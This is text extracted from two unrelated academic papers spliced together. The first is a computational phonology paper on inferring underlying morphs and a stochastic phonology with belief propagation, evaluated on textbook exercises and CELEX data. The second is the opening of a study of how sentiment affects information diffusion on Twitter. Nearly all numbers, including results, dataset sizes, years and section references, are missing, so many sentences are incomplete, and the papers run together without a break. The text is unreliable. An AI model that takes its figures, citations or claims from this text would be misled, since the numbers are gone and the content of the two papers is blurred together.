expected length of a ur according to the previous e-step. the expected length of each uk is extracted from the wfsm for the belief bk, using dynamic pro- gramming (li and eisner, ). we initialized φ to . ; experiments on development data sug- gested that the choice of initializer had little effect. features of the phonology model our stochastic edit process sθ(s | u) assigns a probability to each possible u-to-s edit sequence. this edit sequence corresponds to a character-wise alignment of u to s. our features for modeling the contextual probability of each edit are loosely inspired by constraints from harmonic grammar and optimality theory (smolensky and legendre, ). such constraints similarly evaluate a u-to- s alignment (or “correspondence”). 
they are tra- ditionally divided into markedness constraints that encourage a well-formed s, and faithfulness con- straints that encourage phonemes of s to resemble their aligned phonemes in u. our edit faithfulness features evaluate an edit’s (input, output) phoneme pair. our bigram markedness features evaluate an edit that emits a new phoneme of s. they evaluate the surface bi- gram it forms with the previous output phoneme. table shows example features. notice that these features back off to various natural classes of phonemes (clements and hume, ). these features of an edit need to examine at most ( , , ) phonemes of (left input, right input, left output) context respectively (see figure ). so the pfst that implements sθ should be able to use what cotterell et al. ( ) calls a ( , , ) topol- ogy. however, we actually used a ( , , ) topology, at beginning-of-string, the previous “phoneme” is the special symbol bos. for the halt edit at end-of-string, which copies the symbol eos, the new “phoneme” is eos. to allow features that also look at the “upcoming” input phoneme that immediately follows the edit’s input (/@/ in figure ). specifically, for each nat- ural class, we also included contextual versions of each edit or bigram feature, which fired only if the “upcoming” input phoneme fell in that natu- ral class. contextual bigram features are our ap- proximation to surface trigram features that look at the edit’s output phoneme together with the pre- vious and next output phonemes. (a pfst can- not condition its edit probabilities on the next out- put phoneme because that has not been generated yet—see section . —so we are using the upcom- ing input phoneme as a proxy.) contextual edit features were cheap to add once we were using a ( , , ) topology, and in fact they turned out to be helpful for capturing processes such as catalan’s deletion of the underlyingly final consonant. finally, we included a copy feature that fires on any edit where surface and underlying phonemes are exactly equal. (this feature resem- bles optimality theory’s ident-io constraint, and ends up getting the strongest weight.) in total, our model has roughly , binary features. many improvements to this basic feature set would be possible in future. we cannot currently express implications such as “adjacent obstruents must also agree in voicing,” “a vowel that surfaces must preserve its height,” or “successive vowels must also agree in height.” we also have not yet designed features that are sensitive to surface prosodic boundaries or underlying morph bound- aries. (prosodic structure and autosegmental tiers are absent from our current representations, and we currently simplify the stochastic edit process’s feature set by having sθ erase the # morph bound- aries before applying that process.) our standard prior over θ (section . ) resists overfitting in a generic way, by favoring phonolo- gies that are “simple to describe.” linguistic im- provements are possible here as well. the prior should arguably discourage positive weights more than negative ones, since our features detect con- straint violations that ordinarily reduce probabil- ity. it should also be adjusted to mitigate the cur- rent structural bias against deletion edits, which arises because the single deletion possible in a context must compete on equal footing with |Σs| insertions and |Σs|− substitutions. 
more ambi- tiously, a linguistically plausible prior should pre- fer phonologies that are conservative (s ≈ u) and have low conditional entropies h(s | u),h(u | s) to facilitate communication. experimental design we objectively evaluate our learner on its ability to predict held-out surface forms. this blind testing differs from traditional practice by linguists, who evaluate a manual or automatic analysis (= urs + phonology) on whether it describes the full dataset in a “natural” way that captures “appropriate” gen- eralizations. we avoid such theory-internal evalu- ation by simply quantifying whether the learner’s analysis does generalize (eisner, ). to avoid tailoring to our training/test data, we developed our method, code, features, and hy- perparameters using only two development lan- guages, english and german. thus, our learner was not engineered to do well on the other lan- guages below: the graphs below show its first at- tempt to learn those languages. we do also eval- uate our learners on english and german, using separate training/test data. we provide all our data (including cita- tions, development data, training-test splits, and natural classes) at http://hubal.cs.jhu.edu/ tacl /, along with brief sketches of the phonological phenomena in the datasets, the “gold” stem urs we assumed for evaluation, and our learner’s predictions and error patterns. . evaluation methodology given a probability distribution p over surface word types of a language, we sample a training set of n types without replacement. this simulates reading text until we have seen n distinct types. for each of these frequent words, we observe the sr s and the morpheme sequence ~a. after training our model, we evaluate its beliefs b about the srs s on a disjoint set of test words whose ~a are observed. to improve interpretabil- ity of the results, we limit the test words to those whose morphemes have all appeared at least once in the training set. (any method would presumably get other words badly wrong, just as it would get the training words right.) to evaluate our belief b about the sr of a test word (~a,s∗), we use three measures for which “smaller is better.” first, - loss asks whether s∗ = argmaxs b(s). this could be compared with non-probabilistic predictors. second, the surprisal − log b(s∗) is low if the model finds it plausible http://hubal.cs.jhu.edu/tacl / http://hubal.cs.jhu.edu/tacl / maori catalan tangale indon. . . . . . . cross entropy (bits) maori catalan tangale indon. . . . . . . . expected edit distance maori catalan tangale indon. . . . . . . -best error rate noisy concatenation our method oracle figure : results on the small phonological exercise datasets (≈ word types). smaller numbers are better. preliminary tests suggested that the variance of the prior (section . ) did not strongly affect the results, so we took σ = for all experiments. that s∗ realizes ~a. if so, this holds out promise for future work on analyzing or learning from unan- notated tokens of s∗. third, we evaluate the whole distribution b in terms of ∑ s b(s)l(s ∗,s) where l is unweighted levenshtein distance. we take the average of each measure over test words, weighting those words according to p. this yields our three reported metrics: -best error rate, cross-entropy, and expected edit distance. each metric is the expected value of some mea- sure on a random test token. these metrics are actually random variables, since they depend on the randomly sampled train- ing set and the resulting test distribution. 
We report the expectations of these random variables by running many training-test splits (see section . ).

Datasets

To test discovery of interesting patterns from limited data, we ran our learner on "exercises" drawn from phonology textbooks (English nouns, Maori verbs, Catalan adjectives, Tangale nouns, Indonesian nouns), exhibiting a diverse range of phenomena. In each case we took p to be the uniform distribution over the provided word types. We took n to be one less than the number of provided types. So to report our expected metrics, we ran all n + 1 experiments where we trained jointly on n forms and tested on the remaining form. This is close to linguists' practice of fitting an analysis on the entire dataset, yet it is a fair test.

To test on larger, naturally occurring datasets, we ran our learner on subsets of the CELEX database (Baayen et al.), which provides surface phonological forms and token counts for German, Dutch, and English words. For each language, we constructed a coherent subcorpus of nouns and verbs, focusing on inflections with common phonological phenomena. These turned out to involve mainly voicing: final obstruent devoicing (German 2nd-person present indicative verbs, German nominative singular nouns, Dutch infinitive verbs, Dutch singular nouns) and voicing assimilation (English past tense verbs, English plural nouns). We were restricted to relatively simple phenomena because our current representations are simple segmental strings that lack prosodic and autosegmental structure. In future we plan to consider stress, vowel harmony, and templatic morphology.

We constructed the distribution p in proportion to CELEX's token counts. In each language, we trained on n = , , , or forms sampled from p. To estimate the expectation of each metric over all training sets of size n, we report the sample mean and bootstrap standard error over random training sets of size n. Except in Indonesian, every word happens to consist of at most two morphemes (one stem plus one possibly empty suffix). In all experiments, we take the phonological inventories Σu and Σs to be given as the set of all surface phonemes observed in training ∪ test.

Comparison systems

There do not appear to be previous systems that perform our generalization task. Therefore, we compared our own system against variants. We performed an ablation study to determine whether the learned phonology was helpful. We substituted a simplified phonology model where sθ(s | u) just decays exponentially with the edit distance between s and u; the decay rate was learned by EM as usual. That is, this model uses only the COPY feature of section . This baseline system treats phonology as "noisy concatenation" of learned URs, not trying to model its regularity.

[Figure: results on the CELEX datasets ( word types) at different training set sizes n, plotting 1-best error rate, cross-entropy (bits), and expected edit distance for German, Dutch, and English, for noisy concatenation, our method, and the oracle. The larger training sets were supersets of the smaller ones, obtained by continuing to sample with replacement from p. For each training set, the unconnected points evaluate all words ∉ training whose morphemes ∈ training. Meanwhile, the connected points permit comparison across the values of n, by evaluating only on a common test set found by intersecting the unconnected test sets.]
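The sampling protocol just described is straightforward to simulate. The sketch below is only illustrative (the helper names, the number of runs, and the metric callback are assumptions): it draws training sets of n distinct types according to p and reports a sample mean with a bootstrap standard error.

import random
import statistics

def sample_training_set(p, n, rng):
    # Draw n distinct word types, with probability proportional to p (dict: type -> prob).
    types, weights = list(p), [p[w] for w in p]
    chosen = set()
    while len(chosen) < n:
        chosen.add(rng.choices(types, weights=weights)[0])
    return chosen

def bootstrap_mean_and_se(values, n_boot=1000, rng=None):
    rng = rng or random.Random(0)
    mean = statistics.mean(values)
    boots = [statistics.mean(rng.choices(values, k=len(values))) for _ in range(n_boot)]
    return mean, statistics.stdev(boots)

def expected_metric(p, n, metric_for_split, n_runs=10, seed=0):
    # metric_for_split(training_types) is assumed to train the model on that split
    # and return the test-token-weighted metric (e.g., cross-entropy) for it.
    rng = random.Random(seed)
    per_run = [metric_for_split(sample_training_set(p, n, rng)) for _ in range(n_runs)]
    return bootstrap_mean_and_se(per_run)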
In these plots, each point estimates the metric's expectation over all ways of sampling the training sets; specifically, we plot the sample mean from such runs, with error bars showing a bootstrap estimate of the standard error of the mean. Non-overlapping error bars at a given n always happen to imply that the difference in the two methods' sample means is too extreme to be likely to have arisen by chance (paired permutation test, p < . ). Each time we evaluated some training-test split on some metric, we first tuned σ (section . ) by a coarse grid search where we trained on the first % of the training set and evaluated on the remaining %.

We considered an additional ablation study to determine whether the learned URs were helpful. However, we did not come up with a plausible heuristic for identifying URs in some simpler way. Thus, instead we asked whether the learned URs were as good as hand-constructed URs. Our "oracle" system was allowed to observe gold-standard URs for stems instead of inferring them. This system is still fallible: it must still infer the affix URs by belief propagation, and it must still use MAP-EM to estimate a phonology within our current model family sθ. Even with supervision, this family will still struggle to model many types of phonology, e.g., ablaut patterns (in Germanic strong verbs) and many stress-related phenomena.

Results

We graph our results in the two figures above. When given enough evidence, our method works quite well across the datasets. For – % of held-out words on the CELEX languages (when n = ), and – % on the phonological exercises, our method's top pick is the correct surface form. Further, the other metrics show that it places most of its probability mass on that form, and the rest on highly similar forms. Notably, our method's predictions are nearly as good as if gold stem URs had been supplied (the "oracle" condition). Indeed, it does tend to recover those gold URs (see the table below).

[Table: percent of training words, weighted by the distribution p, whose 1-best recovered UR (including the boundary #) exactly matches the manual "gold" analysis; results are averages over all runs (with n = for the CELEX datasets). Rows pair the phonological exercises (Maori, Catalan, Tangale, Indonesian) with the CELEX languages (German, Dutch, English).]

Yet there are some residual errors in predicting the SRs. Our phonological learner cannot perfectly learn the UR-to-SR mapping even from many well-supervised pairs (the oracle condition). (A cross-entropy below 1 bit means that the correct form has probability above 1/2 on average, using the geometric mean.) In the CELEX and Tangale datasets, this is partly due to irregularity in the language itself. However, error analysis suggests we also miss some generalizations due to the imperfections of our current sθ model (as discussed in sections . and ).

When given less evidence, our method's performance is more sensitive to the training sample and is worse on average. This is expected: e.g., a stem's final consonant cannot be reconstructed if it was devoiced (German) or deleted (Maori) in all the training SRs. However, a contributing factor may be the increased error rate of the phonological learner, visible even with oracle data. Thus, we suspect that a sθ model with better generalization would improve our results at all training sizes. Note that harming sθ—allowing only "noisy concatenation"—clearly harms the method, proving the need for true phonological modeling.

Related work

Jarosz ( , § ) and Tesar ( , chapters – ) review work on learning the phonology sθ.
phonologists pioneered stochastic-gradient and passive-aggressive training methods—the gradual learning algorithm (boersma, ) and error- driven constraint demotion (tesar and smolen- sky, )—for structured prediction of the sur- face word s from the underlying word u. if s is not fully observed during training (we illustrate why in layer of figure ), then it can be imputed, a step known as robust interpretive parsing. recent papers consider our setting where u = m #m # · · · is not observed either. the contrast analysis method (tesar, ; merchant, ) in effect uses constraint propagation (dechter, ). that is, it serially eliminates variable values (de- scribing aspects of the urs or the constraint rank- ing) that are provably incompatible with the data. constraint propagation is an incomplete method that is not guaranteed to make all logical de- ductions. we use its probabilistic generalization, loopy belief propagation (dechter et al., )— which is still approximate but can deal with noise and stochastic irregularity. a further improvement is that we work with string-valued variables, repre- senting uncertainty using wfsms; this lets us rea- son about urs of unknown length and unknown alignment to the srs. (tesar and merchant in- stead used binary variables, one for each segmen- tal feature in each ur, requiring the simplifying assumption that the urs are known except for their segmental features. they assume that srs are annotated with morph boundaries and that the phonology only changes segmental features, never inserting or deleting segments.) on the other hand, tesar and merchant reason globally about the con- straint ranking, whereas in this paper, we only lo- cally improve the phonology—we use em, rather than the full bayesian approach that treats the pa- rameters ~θ as variables within bp. jarosz ( ) is closest to our work in that she uses em, just as we do, to maximize the probabil- ity of observed surface forms whose constituent morphemes (but not morphs) are known. her model is a probabilistic analogue of apoussidou ( ), who uses a latent-variable structured per- ceptron. a non-standard aspect of this model (de- fended by pater et al. ( )) is that a morpheme a can stochastically choose different morphs m(a) when it appears in different words. to obtain a sin- gle shared morph, one could penalize this distribu- tion’s entropy, driving it toward as learning pro- ceeds. such an approach—which builds on a sug- gestion by eisenstat ( , § . )—would loosely resemble dual decomposition (peng et al., ). unlike our bp approach, it would maximize rather than marginalize over possible morphs. our work has focused on scaling up inference. for the phonology s, the above papers learn the weights or rankings of just a few plausible con- straints (or jarosz ( ) learns a discrete distribu- tion over all ! = rankings of constraints), whereas we use sθ with roughly , con- straints (features) to enable learning of unknown languages. our s also allows exceptions. the above papers also consider only very restricted sets of morphs, either identifying a small set of plausible morphs or prohibiting segmental inser- tion/deletion. we use finite-state methods so that it is possible to consider the space Σ∗u of all strings. on the other hand, we are divided from pre- vious work by our inability to use an ot gram- mar (prince and smolensky, ), a stochastic ot grammar (boersma, ), or even a maxi- mum entropy grammar (goldwater and johnson, ; dreyer et al., ; eisenstat, ). 
(Jarosz still assumes that word SRs are annotated with morpheme boundaries, and that a small set of possible morphs is given; these assumptions are relaxed by Eisenstat.) The reason is that our BP method inverts the phonological mapping sθ to find possible word URs. Given a word SR s, we construct a WFSM (message) that scores every possible UR u ∈ Σ∗u: the score of u is sθ(s | u). To accomplish this step without approximation, our method needs sθ itself to be represented as a WFSM (section . ). (The WFSM for a maximum entropy grammar unfortunately does not compute sθ but only an unnormalized version. A different normalizing constant is needed for each u, akin to the "double intractability" problem in Bayesian learning.)

In the NLP community, Elsner et al. resembles our work in many respects. Like us, they recover a latent underlying lexicon (using the same simple prior Mφ) and use EM to learn a phonology (rather similar to our sθ, though less powerful). (Elsner et al. used an sθ quite similar to ours, though lacking bigram well-formedness features; a later version simplified this for efficiency, disallowing segmental deletion and no longer modeling the context of changes.) Unlike us, they do not assume annotation of the (abstract) morpheme sequence, but jointly learn a nonparametric bigram model to discover the morphemes. Their evaluation is quite different, as their aim is actually to recover underlying words from phonemically transcribed child-directed English utterances. However, nothing in their model distinguishes words from morphemes—indeed, sometimes they do find morphemes instead—so their model could be used in our task. For inference, they invert the finite-state sθ like us to reconstruct a lattice of possible UR strings. However, they do this not within BP but within a block Gibbs sampler that stochastically reanalyzes utterances one at a time. Whereas our BP tries to find a consensus UR for each given morpheme type, their sampler posits morph tokens while trying to reuse frequent morph types, which are interpreted as the morphemes. With observed morphemes (our setting), this sampler would fail to mix.

Dreyer and Eisner, like us, used loopy BP and MAP-EM to predict morphological SRs. Their paper was also able to exploit raw text without morphological supervision. However, they directly modeled pairwise finite-state relationships among the surface word forms without using URs. Their model is a joint distribution over n variables: the word SRs of a single inflectional paradigm. Since it requires a fixed n, it does not directly extend to derivational morphology: deriving new words would require adding new variables, which—for an undirected model like theirs—changes the partition function and requires retraining. By contrast, our trained directed model is a productive phonological system that can generate unboundedly many new words (see section . ). By analogy, n samples from a Gaussian would be described with a directed model, and inferring the Gaussian parameters predicts any number of future samples n + 1, n + 2, . . . .

Bouchard-Côté et al., in a series of papers, have used directed graphical models over strings, like ours though without loops, to model diachronic sound change. Sometimes they use belief propagation for inference (Hall and Klein). Their goal is to recover latent historical forms (conceptually, surface forms) rather than latent underlying forms.
the results are evaluated against manual reconstructions. none of this work has segmented words into morphs, although dreyer et al. ( ) did seg- ment surface words into latent “regions.” creutz and lagus ( ) and goldsmith ( ) segment an unannotated collection of words into reusable morphs, but without modeling contextual sound change, i.e., phonology. conclusions and future work we have laid out a probabilistic model for gener- ative phonology. this lets us infer likely expla- nations of a collection of morphologically related surface words, in terms of underlying morphs and productive phonological changes. we do this by combining well-motivated algorithms for in- ference in graphical models and map estimation from incomplete data, using weighted finite-state machines to encode uncertainty. throughout our presentation, we were careful to point out various limitations of our setup. but in each case, we also outlined how future work could address these lim- itations within the framework we propose here. finally, we proposed a detailed scheme for quantitative evaluation of phonological learners. across different languages, on both small and larger datasets, our learner was able to predict held-out surface forms with low error rates. acknowledgments this material is based upon work supported by the national science foundation under grant no. , and by a fulbright grant to the first au- thor. we thank the anonymous reviewers and reut tsarfaty for useful discussion of presentation, ter- minology, and related work. references diana apoussidou. . on-line learning of under- lying forms. technical report roa- , rutgers optimality archive. r harald baayen, richard piepenbrock, and leon gu- likers. . the celex lexical database on cd- rom. juliette blevins. . a phonological and morpho- logical reanalysis of the maori passive. te reo, : – . paul boersma and bruce hayes. . empirical tests of the gradual learning algorithm. linguistic in- quiry, ( ): – . paul boersma. . how we learn variation, option- ality, and probability. in proc. of the institute of phonetic sciences of the university of amsterdam, volume , pages – . paul boersma. . how we learn variation, op- tionality, and probability. in functional phonology: formalizing the interactions between articulatory and perceptual drives, chapter . ph.d. disserta- tion, university of amsterdam. previously appeared in ifa proceedings ( ), pp. – . alexandre bouchard-côté, percy liang, thomas l. griffiths, and dan klein. . a probabilistic ap- proach to language change. in proc. of nips. alexandre bouchard-côté, david hall, thomas l. griffiths, and dan klein. . automated re- construction of ancient languages using probabilis- tic models of sound change. proceedings of the na- tional academy of sciences. noam chomsky and morris halle. . the sound pattern of english. harper and row. george n clements and elizabeth v hume. . the internal organization of speech sounds. in john goldsmith, editor, handbook of phonological the- ory. oxford university press, oxford. ryan cotterell and jason eisner. . penalized expectation propagation for graphical models over strings. in proceedings of naacl-hlt, pages – , denver, june. supplementary material ( pages) also available. ryan cotterell, nanyun peng, and jason eisner. . stochastic contextual edit distance and probabilistic fsts. in proc. of acl. mathias creutz and krista lagus. . inducing the morphological lexicon of a natural language from unannotated text. in proc. 
of the international and interdisciplinary conference on adaptive knowl- edge representation and reasoning (akrr ), vol- ume . rina dechter, bozhena bidyuk, robert mateescu, and emma rollon. . on the power of belief propagation: a constraint propagation per- spective. in rina dechter, hector geffner, and joseph y. halpern, editors, heuristics, probability and causality: a tribute to judea pearl. college publications. rina dechter. . constraint processing. morgan kaufmann. markus dreyer and jason eisner. . graphical models over multiple strings. in proc. of emnlp, pages – . markus dreyer and jason eisner. . discover- ing morphological paradigms from plain text us- ing a dirichlet process mixture model. in proc. of emnlp, emnlp ’ , pages – . markus dreyer, jason r. smith, and jason eisner. . latent-variable modeling of string transduc- tions with finite-state methods. in proc. of emnlp, pages – . markus dreyer. . a non-parametric model for the discovery of inflectional paradigms from plain text using graphical models over strings. ph.d. thesis, johns hopkins university, baltimore, md, april. sarah eisenstat. . learning underlying forms with maxent. master’s thesis, brown university, providence, ri. jason eisner. a. comprehension and compilation in optimality theory. in proc. of acl, pages – , philadelphia, july. jason eisner. b. discovering syntactic deep structure via bayesian statistics. cognitive science, ( ): – , may-june. jason eisner. . should linguists evaluate gram- mars or grammar learners? in preparation. micha elsner, sharon goldwater, and jacob eisenstein. . bootstrapping a unified model of lexical and phonetic acquisition. in proc. of acl, pages – . micha elsner, sharon goldwater, naomi feldman, and frank wood. . a joint learning model of word segmentation, lexical acquisition, and phonetic vari- ability. in proc. of emnlp, pages – . alexander m. fraser, marion weller, aoife cahill, and fabienne cap. . modeling inflection and word- formation in smt. in proc. of eacl, pages – . j. goldsmith. . an algorithm for the unsupervised learning of morphology. natural language engi- neering, ( ): – . sharon goldwater and mark johnson. . learning ot constraint rankings using a maximum entropy model. in proc. of the workshop on variation within optimality theory, pages – , stockholm uni- versity. david hall and dan klein. . finding cognate groups using phylogenies. in proc. of acl. bruce hayes and colin wilson. . a maximum en- tropy model of phonotactics and phonotactic learn- ing. linguistic inquiry, ( ): – . matt hohensee and emily m. bender. . getting more from morphology in multilingual dependency parsing. in proc. of naacl-hlt, pages – . mans hulden. . revisiting multi-tape automata for semitic morphological analysis and generation. in proc. of the eacl workshop on computa- tional approaches to semitic languages, pages – , march. sharon inkelas and cheryl zoll. . reduplication: doubling in morphology. number in cam- bridge studies in linguistics. cambridge university press. roman jakobson. . russian conjugation. word, : – . gaja jarosz. . richness of the base and prob- abilistic unsupervised learning in optimality theory. in proc. of the eighth meeting of the acl special in- terest group on computational phonology and mor- phology, pages – . gaja jarosz. . learning with hidden structure in optimality theory and harmonic grammar: beyond robust interpretive parsing. phonology, ( ): – . c. douglas johnson. . formal aspects of phono- logical description. mouton. rené kager. . 
optimality theory, volume . mit press. ronald m. kaplan and martin kay. . regu- lar models of phonological rule systems. compu- tational linguistics, ( ): – . michael j kenstowicz and charles w kisseberth. . generative phonology. academic press san diego. andrás kornai. . formal phonology. garland publishing, new york. zhifei li and jason eisner. . first- and second- order expectation semirings with applications to minimum-risk training on translation forests. in proc. of emnlp, pages – , singapore, august. dong c. liu and jorge nocedal. . on the limited memory bfgs method for large scale optimization. mathematical programming, ( - ): – . andrew mccallum, dayne freitag, and fernando c. n. pereira. . maximum entropy markov mod- els for information extraction and segmentation. in proc. of icml, pages – . navarré merchant. . discovering underlying forms: contrast pairs and ranking. ph.d. thesis, rutgers university. available on the rutgers opti- mality archive as roa- . kevin p. murphy, yair weiss, and michael i. jordan. . loopy belief propagation for approximate in- ference: an empirical study. in proc. of uai, pages – . joe pater, karen jesney, robert staubs, and brian smith. . learning probabilities over underly- ing representations. in proc. of the twelfth meet- ing of the special interest group on computational morphology and phonology, pages – . judea pearl. . probabilistic reasoning in in- telligent systems: networks of plausible inference. morgan kaufmann publishers inc., san francisco, ca, usa. nanyun peng, ryan cotterell, and jason eisner. . dual decomposition inference for graphical models over strings. in proceedings of emnlp, lisbon, september. to appear. janet pierrehumbert. . probabilistic phonology: discrimination and robustness. in probabilistic lin- guistics, pages – . mit press. alan prince and paul smolensky. . optimality theory: constraint interaction in generative gram- mar. wiley-blackwell. jason a. riggle. . generation, recognition, and learning in finite state optimality theory. ph.d. thesis, university of california at los angeles. jason riggle. . phonological features. available online at http://www.mml.cam.ac.uk/ dtal/courses/ugrad/paper_support/ li /riggle-feature-chart.pdf (re- trieved - - ). david sankoff. . probability and linguistic varia- tion. synthese, ( ): – . ferdinand de saussure. . course in general lin- guistics. columbia university press. english edi- tion of june , based on the translation by wade baskin. paul smolensky and géraldine legendre. . the harmonic mind: from neural computation to optimality-theoretic grammar (vol. : cognitive architecture). mit press. bruce tesar and paul smolensky. . learnability in optimality theory. linguistic inquiry, ( ): – . http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li /riggle-feature-chart.pdf http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li /riggle-feature-chart.pdf http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li /riggle-feature-chart.pdf bruce tesar. . contrast analysis in phonological learning. technical report roa- , rutgers opti- mality archive. bruce tesar. . output-driven phonology: theory and learning. cambridge university press. reyyan yeniterzi. . exploiting morphology in turkish named entity recognition system. in proc. of the acl student session, pages – . introduction formal framework probability model discussion: why probability? 
Quantifying the effect of sentiment on information diffusion in social media

Emilio Ferrara and Zeyao Yang
Information Sciences Institute, University of Southern California, Marina del Rey, CA, United States
School of Informatics and Computing, Indiana University, Bloomington, IN, United States
Corresponding author: Emilio Ferrara, ferrarae@isi.edu, emilio.ferrara@gmail.com. Academic editor: Ciro Cattuto.

Abstract

Social media has become the main vehicle of information production and consumption online. Millions of users every day log on to their Facebook or Twitter accounts to get updates and news, read about their topics of interest, and become exposed to new opportunities and interactions. Although recent studies suggest that the contents users produce will affect the emotions of their readers, we still lack a rigorous understanding of the role and effects of content sentiment on the dynamics of information diffusion. This work aims at quantifying the effect of sentiment on information diffusion, to understand: (i) whether positive conversations spread faster and/or broader than negative ones (or vice-versa); (ii) what kind of emotions are more typical of popular conversations on social media; and, (iii) what type of sentiment is expressed in conversations characterized by different temporal dynamics. Our findings show that, at the level of contents, negative messages spread faster than positive ones, but positive ones reach larger audiences, suggesting that people are more inclined to share and favorite positive content, the so-called positive bias. As for entire conversations, we highlight how different temporal dynamics exhibit different sentiment patterns: for example, positive sentiment builds up for highly-anticipated events, while unexpected events are mainly characterized by negative sentiment. Our contribution represents a step forward in understanding how the emotions expressed in short texts correlate with their spreading in online social ecosystems, and may help to craft effective policies and strategies for content generation and diffusion.

Subjects: Data Mining and Machine Learning, Data Science, Network Science and Online Social Networks
Keywords: Computational social science, social networks, social media, sentiment analysis, information diffusion

Introduction

The emerging field of computational social science has been focusing on studying the characteristics of techno-social systems (Lazer et al.; Vespignani; Kaplan & Haenlein; Asur & Huberman; Cheng et al.) to understand the effects of technologically-mediated communication on our society (Gilbert & Karahalios; Ferrara; Tang, Lou & Kleinberg; De Meo et al.; Backstrom & Kleinberg).
Research on information diffusion has focused on the complex dynamics that characterize social media discussions (Java et al.; Huberman, Romero & Wu; Bakshy et al.; Ferrara et al., a) to understand their role as central fora to debate social issues (Conover et al., b; Conover et al., a; Varol et al.), to leverage their ability to enhance situational, social, and political awareness (Sakaki, Okazaki & Matsuo; Centola; Bond et al.; Ratkiewicz et al.; Metaxas & Mustafaraj; Ferrara et al.), or to study susceptibility to influence and social contagion (Aral, Muchnik & Sundararajan; Aral & Walker; Myers, Zhu & Leskovec; Anderson et al.; Lerman & Ghosh; Ugander et al.; Weng & Menczer; Weng, Menczer & Ahn). The amount of information that is generated and shared through online platforms like Facebook and Twitter yields unprecedented opportunities to millions of individuals every day (Kwak et al.; Gomez Rodriguez, Leskovec & Schölkopf; Ferrara et al., b). Yet our understanding of the role of the sentiment and emotions conveyed through the content produced and consumed on these platforms remains shallow.

In this work we are concerned in particular with quantifying the effect of sentiment on information diffusion in social networks. Although recent studies suggest that emotions are passed via online interactions (Harris & Paradice; Mei et al.; Golder & Macy; Choudhury, Counts & Gamon; Kramer, Guillory & Hancock; Ferrara & Yang; Beasley & Mason), and that many characteristics of the content may affect information diffusion (e.g., language-related features (Nagarajan, Purohit & Sheth), hashtag inclusion (Suh et al.), network structure (Recuero, Araujo & Zago), user metadata (Ferrara et al.)), little work has been devoted to quantifying the extent to which sentiment drives information diffusion in online social media. Some studies suggested that content conveying positive emotions could acquire more attention (Kissler et al.; Bayer, Sommer & Schacht; Stieglitz & Dang-Xuan) and trigger higher levels of arousal (Berger), which can further affect feedback and reciprocity (Dang-Xuan & Stieglitz) and social sharing behavior (Berger & Milkman).

In this study, we take Twitter as our scenario, and we explore the complex dynamics intertwining sentiment and information diffusion. We start by focusing on content spreading, exploring what effects sentiment has on the diffusion speed and on content popularity. We then shift our attention to entire conversations, categorizing them into different classes depending on their temporal evolution: we highlight how different types of discussion dynamics exhibit different types of sentiment evolution. Our study provides a timely step toward understanding the intricate dynamics intertwining information diffusion and emotions on social media.
Materials and Methods

Sentiment analysis

Sentiment analysis has proven an effective tool to analyze social media streams, especially for predictive purposes (Pang & Lee; Bollen, Mao & Zeng; Bollen, Mao & Pepe; Le, Ferrara & Flammini). A number of sentiment analysis methods have been proposed to date to capture content sentiment, and some have been specifically designed for short, informal texts (Akkaya, Wiebe & Mihalcea; Paltoglou & Thelwall; Hutto & Gilbert). To attach a sentiment score to the tweets in our dataset, we here adopt SentiStrength, a sentiment analysis algorithm that, compared to other tools, provides several advantages: first, it is optimized to annotate short, informal texts, like tweets, that contain abbreviations, slang, and the like. SentiStrength also employs additional linguistic rules for negations, amplifications, booster words, emoticons, spelling corrections, etc. Research applications of SentiStrength to MySpace data found it particularly effective at capturing positive and negative emotions with, respectively, . % and . % accuracy (Thelwall et al.; Thelwall, Buckley & Paltoglou; Stieglitz & Dang-Xuan).

The algorithm assigns to each tweet t a positive s+(t) and negative s−(t) sentiment score, both ranging between 1 (neutral) and 5 (strongly positive/negative). Starting from the sentiment scores, we capture the polarity of each tweet t with one single measure, the polarity score s(t), defined as the difference between positive and negative sentiment scores:

s(t) = s+(t) − s−(t).

The above-defined score ranges between −4 and +4. The former score indicates an extremely negative tweet, and occurs when s+(t) = 1 and s−(t) = 5. Vice-versa, the latter identifies an extremely positive tweet labeled with s+(t) = 5 and s−(t) = 1. In the case s+(t) = s−(t), that is, when the positive and negative sentiment scores of a tweet t are the same, the polarity s(t) = 0 of tweet t is considered as neutral. We decided to focus on the polarity score (rather than the two dimensions of sentiment separately) because previous studies highlighted the fact that measuring the overall sentiment is easier and more accurate than trying to capture the intensity of sentiment; this is especially true for short texts like tweets, due to the paucity of information conveyed in up to 140 characters (Thelwall et al.; Thelwall, Buckley & Paltoglou; Stieglitz & Dang-Xuan; Ferrara & Yang).

Data

The dataset adopted in this study contains a sample of all public tweets produced during September . From the Twitter gardenhose (a roughly % sample of the social stream that we process and store at Indiana University) we extracted all tweets in English that do not contain URLs or media content (photos, videos, etc.) produced in that month. This choice is dictated by the fact that we can hardly computationally capture the sentiment or emotions conveyed by multimedia content, and processing content from external resources (such as webpages, etc.) would be computationally hard. This dataset comprises , , tweets (more than six times larger than the Facebook experiment (Kramer, Guillory & Hancock)) produced by , , distinct users. All tweets are processed by SentiStrength and attached with sentiment scores (positive and negative) and with the polarity score calculated as described before.
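As a concrete illustration of how the polarity score and the sentiment classes used below can be derived from SentiStrength-style scores, here is a short sketch; the function names are ours, and the ±1 class thresholds reflect our reading of the class definitions given in the next paragraph.

def polarity(s_plus, s_minus):
    # Polarity score s(t) = s+(t) - s-(t); with scores in 1..5 this spans -4..+4.
    return s_plus - s_minus

def sentiment_class(s_plus, s_minus):
    s = polarity(s_plus, s_minus)
    if s <= -1:
        return "negative"
    if s >= 1:
        return "positive"
    return "neutral"   # s == 0: positive and negative scores cancel out

# Toy usage on (s+, s-) pairs as a SentiStrength-style annotator might assign them:
for scores in [(5, 1), (1, 5), (2, 2)]:
    print(scores, sentiment_class(*scores))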
